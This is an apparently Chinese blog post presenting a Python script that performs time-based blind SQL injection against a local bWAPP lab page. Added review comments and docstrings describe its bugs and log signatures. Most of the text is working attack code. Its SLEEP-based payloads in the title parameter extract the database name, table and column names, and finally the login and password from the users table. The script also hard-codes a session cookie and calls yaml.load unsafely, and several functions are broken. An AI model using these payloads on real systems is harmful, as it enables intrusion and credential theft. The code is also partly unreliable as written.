sql注入----sql injection script

2022/7/12 2:20:08


import requests
import time
import yaml

# Request headers for every probe. The session is a hard-coded PHPSESSID
# cookie, i.e. a credential embedded in source: it is bound to one login
# session and stops working once that session expires. "security_level=0"
# is presumably bWAPP's difficulty setting - confirm against the target build.
HEADER={
    "cookie":"PHPSESSID=mgmbi0f5munhthiqfrvbmg73v1; security_level=0"
}
# Target endpoint: a local bWAPP training instance. Every function below sends
# GET requests here with its payload in the `title` query parameter and treats
# a response slower than 2 s wall-clock as a "true" answer (time-based oracle).
# Server side, a parameterized query removes this class of issue entirely; in
# the access logs the signature is a burst of near-identical requests that
# differ only in one integer and carry "SLEEP(" / "-- " in the query string.
BASE_URL='http://localhost/bWAPP/app/sqli_15.php'
# Absolute Windows path; the file is read at import time (see the `with` below).
config_path = "E:/Django/hhPro/yamls/sqlBlindInjection.yaml"
# Read the config file (the original comment calls it test.yaml).
with open(config_path, "r") as file:
    # NOTE(review): yaml.load() without an explicit Loader - PyYAML 6 raises
    # TypeError here, and older releases fall back to a loader that can build
    # arbitrary Python objects. yaml.safe_load is the usual choice for config.
    # open() has no encoding= either, so decoding follows the platform default.
    data = yaml.load(file.read())
    # SQL fragment taken from the config; get_table_count (the first definition
    # of that name, below) splices it verbatim into its query string.
    student1 = data["BLINDSQL"]["SQL1"]
    #print(student1)

def get_database_name_length(a: str, b: str)->int:
    """Probe the length of the current database name with a timing oracle.

    Generic form of get_database_name(): `a` is the base URL and `b` is a
    query-string template with one `{}` slot that receives the candidate
    length. Candidates 1..99 are tried in order; the first one whose GET
    takes longer than 2 s wall-clock is returned, 0 if none does.

    Args:
        a: target URL; a trailing "?" is appended when missing.
        b: query-string template, formatted with the candidate integer.

    Returns:
        The candidate that produced the slow response, or 0.

    Raises:
        IndexError: if `a` is an empty string (`a[-1]`).
    """
    count=0
    #title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
    # Make sure the template can be appended as a query string.
    if a[-1]!="?":
        a=a+"?"
    for i in range(1,100):
        url=a+b.format(i)
        start_time = time.time()
        # Echoes the full probe URL, payload included, to stdout.
        print(url)
        # No timeout= : a stalled server blocks this call indefinitely.
        requests.get(url,headers=HEADER)
        # Wall-clock time is the only signal, so network jitter above 2 s
        # produces a false positive; results are unreliable over a slow link.
        if time.time() - start_time > 2:
            print("盲注数据库名长度为{}".format(i))
            count = i
            return count
    return count

#Get the length of the database name (the query measures LENGTH(DATABASE())).
def get_database_name()->int:
    """Return the length of the current database name, or 0 if not found.

    Despite the name this does not return the database name: the query
    compares LENGTH(DATABASE()) with candidates 1..99 and the first GET that
    takes more than 2 s wall-clock selects the candidate. Same loop as
    get_database_name_length() with the URL template fixed to BASE_URL.

    Returns:
        The matching length, or 0 when no candidate produced a slow response.
    """
    count=0
    #title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(2) -- &action=search".format(i)
        start_time = time.time()
        # No timeout= on the request; a stalled server blocks here.
        requests.get(url,headers=HEADER)
        # Timing oracle; the 2 s threshold matches the SLEEP(2) in the payload.
        if time.time() - start_time > 2:
            print("盲注数据库名长度为{}".format(i))
            count = i
            return count
    return count
#Get the database name, one character at a time.
def get_database_table(count):
    """Reconstruct the database name character by character and print it.

    Despite the name this targets DATABASE(), not a table. For each position
    i in 1..count it tries byte values 33..126 (printable ASCII) and appends
    chr(m) for the first candidate whose GET exceeds 2 s wall-clock; a
    position with no slow answer is silently skipped.

    Args:
        count: number of characters to recover (the __main__ block pairs it
            with get_database_name()).

    Returns:
        None; the recovered name is only printed.
    """
    #mmp=get_database_name()
    x=""
    for i in range(1,count+1):
        for m in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND ord(mid(DATABASE(),{},1))={} and SLEEP(2) -- &action=search".format(i,m)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                x=x+chr(m)
                # NOTE(review): str has no attribute `chr`, so this line raises
                # AttributeError on the first hit; the break below is never reached.
                print("盲注数据库名长度为{}".chr(m))
                break
    print("打印数据库名称"+x)

#Get the number of tables in the current database.
def get_table_count()->int:
    """Probe a count whose SQL comes from the YAML config and return it.

    The left-hand side of the comparison is `student1` (config key
    BLINDSQL/SQL1), spliced verbatim into the query string; the original
    comment says it counts the tables of the current database. Candidates
    1..99 are tried and the first GET over 2 s wall-clock wins.

    NOTE(review): a second `get_table_count` is defined further down in this
    module; being later, it replaces this one, so any call made after import
    runs that definition (the users-column count), not this one.

    Returns:
        The matching candidate.

    Raises:
        UnboundLocalError: if no candidate produces a slow response, because
            `count` is only assigned inside the `if`.
    """
    for i in range(1,100):
        # "={}".format(i) binds to that literal only; the rest is concatenated.
        url=BASE_URL+"?title=Iron Man' and "+student1+"={}".format(i)+" -- &action=search"
        start_time=time.time()
        requests.get(url,headers=HEADER)
        if time.time()-start_time>2:
            count =i
            # "{}" is literal text here (concatenation, not .format), so the
            # output reads "...{}<count>".
            print("打印当前数据库下面表数量{}"+str(count))
            break
    return count

#Get the length of every table name, then recover each name.
def get_table_counts(counts)->int:
    """Find each table name's length and hand it to get_database_tabless().

    For table index i in 0..counts (counts+1 indices, selected via LIMIT i,1)
    the lengths 1..99 are tried; the first GET over 2 s wall-clock is taken
    as the length, get_database_tabless(i, m) is called to recover that name,
    and the next index is processed.

    Args:
        counts: highest table index to probe (inclusive).

    Returns:
        Whatever `m` held when the loops ended - the last probed length of the
        last index - which is not a meaningful result on its own.

    Raises:
        UnboundLocalError: if `counts` is negative, since the loops never
            run and `m` is never bound.
    """
    for i in range(counts + 1):
        for m in range(1,100):
            url=BASE_URL+"?title=Iron Man' and (select length(table_name) from information_schema.tables where table_schema=database() limit {},1)={}" \
                        " and sleep(2) -- &action=search".format(i,m)
            start_time=time.time()
            requests.get(url,headers=HEADER)
            if time.time()-start_time>2:
                print("打印当前表名长度{}".format(m))
                # Recover the name now that its length is known.
                get_database_tabless(i, m)
                break
    return m

#Recover the name of one table (called once per index by get_table_counts).
def get_database_tabless(index,count):
    """Reconstruct the table name at position `index` and print it.

    For character positions 1..count the byte values 33..126 are tried; the
    first GET over 2 s wall-clock appends chr(m). The name is printed, then
    the accumulator is cleared before returning.

    Args:
        index: 0-based LIMIT offset of the table in information_schema.tables.
        count: length of the name (from get_table_counts).

    Returns:
        Always "" - `x` is reset before the return, so callers only see the
        result through the print.
    """
    x=""
    for i in range(1,count+1):
        for m in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND " \
                         "ascii(substr((select table_name from information_schema.tables " \
                         "where table_schema=database() limit {},1),{},1))={}" \
                         " and sleep(2) -- &action=search".format(index,i,m)
            # The subquery selects one table name (LIMIT index,1); substr(...,i,1)
            # takes its i-th character and ascii() compares that with m.
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                x=x+chr(m)
                break
    # "{}" is literal here (concatenation, not .format).
    print("打印数据库名称{}" + x)
    x=""
    return x

#From the printed results, next find the total number of columns in the users table.
def get_table_count()->int:
    """Return the column count of the `users` table, or 0 if not found.

    Candidates 1..99 are compared against count(column_name) for
    table_name='users'; the first GET over 2 s wall-clock is returned.

    NOTE(review): this is the second definition of `get_table_count` in the
    module and silently replaces the first one (the table-count probe that
    uses `student1`). Renaming one of them keeps both callable.

    Returns:
        The matching column count, or 0.
    """
    count=0
    #select count(column_name) from information_schema.columns where table_name='users'  counts how many columns the users table has
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' AND (select count(column_name) from information_schema.columns where table_name='users')={} " \
                     "AND SLEEP(2) -- &action=search".format(i)
        start_time = time.time()
        requests.get(url,headers=HEADER)
        if time.time() - start_time > 2:

            print("盲注数据库中users表列数量为:{}".format(i))
            count = i
            return count
    return count

#Get the length of each column name in the users table.
def get_table_nameNumber(count):
    """Find each `users` column name's length and call get_column_name_of().

    For column index i in 0..count (count+1 indices, via LIMIT i,1) the
    lengths 0..99 are tried; on the first GET over 2 s wall-clock,
    get_column_name_of(i, j) runs and the length is printed.

    Args:
        count: highest column index to probe (inclusive).

    Returns:
        None.
    """
    for i in range(count+1):
        for j in range(100):
            url=BASE_URL+"?title=Iron Man' AND (select length(column_name) from information_schema.columns where table_name='users' limit {},1)={} " \
                     "AND SLEEP(2) -- &action=search".format(i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                # Name recovery runs before the length is printed.
                get_column_name_of(i,j)
                print("user表,字段长度为{}".format(j))
                break

#Get the name of each column.
def get_column_name_of(index,count):
    """Print candidate characters of the column name at `index`.

    Args:
        index: 0-based column index.
        count: name length; positions 0..count are iterated.

    Returns:
        None; each hit prints chr(j).

    NOTE(review): the template has two `{}` slots but .format() receives
    three arguments (index, i, j). str.format drops the surplus argument, so
    `j` never reaches the request: the compared value in the URL is `i`, and
    the printed chr(j) is unrelated to what was actually sent.
    """
    for i in range(count+1):
        for j in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND " \
                         "ascii(substr(select column_name form information_schema.columns where table_name='user'),{},1)={} " \
                         "AND SLEEP(2) -- &action=search".format(index,i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                print(chr(j))
                break

#Get the username and password from the wanted columns.
def get_username_password():
    """Reconstruct login and password of the first `users` row and print them.

    Positions 0..99 of concat(login,',',password) are probed with byte values
    33..126; the first GET over 2 s wall-clock appends chr(j). Positions with
    no slow answer are skipped, so the output can be shorter than the value.
    A single call issues up to 100*94 requests against one endpoint - the
    volume a rate limit or log alert keys on.

    Returns:
        None; `values` is printed and then cleared.
    """
    values=""
    for i in range(100):
        for j in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND ascii(substr((select concat(login,',',password) from users limit 0,1),{},1))={} " \
                         "AND SLEEP(2) -- &action=search".format(i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                values=values+chr(j)
                break
    print(values)
    values=""

备注:盲注的时候一般使用and

if __name__=='__main__':
    # Earlier steps of the walkthrough are left commented out; only the final
    # credential probe runs. At this point get_table_count() resolves to the
    # second definition in the module (users column count), not the first.
    #get_table_counts(get_table_count())
    #get_database_table(get_database_name())
    #get_table_counts(get_table_count())
    #get_table_count()
    #get_table_count()#print the total number of columns in the users table
    get_username_password()#print the wanted output

userAgent:浏览器访问要求,可以绕过最简单的内容,单引号判断sql注入

 

 







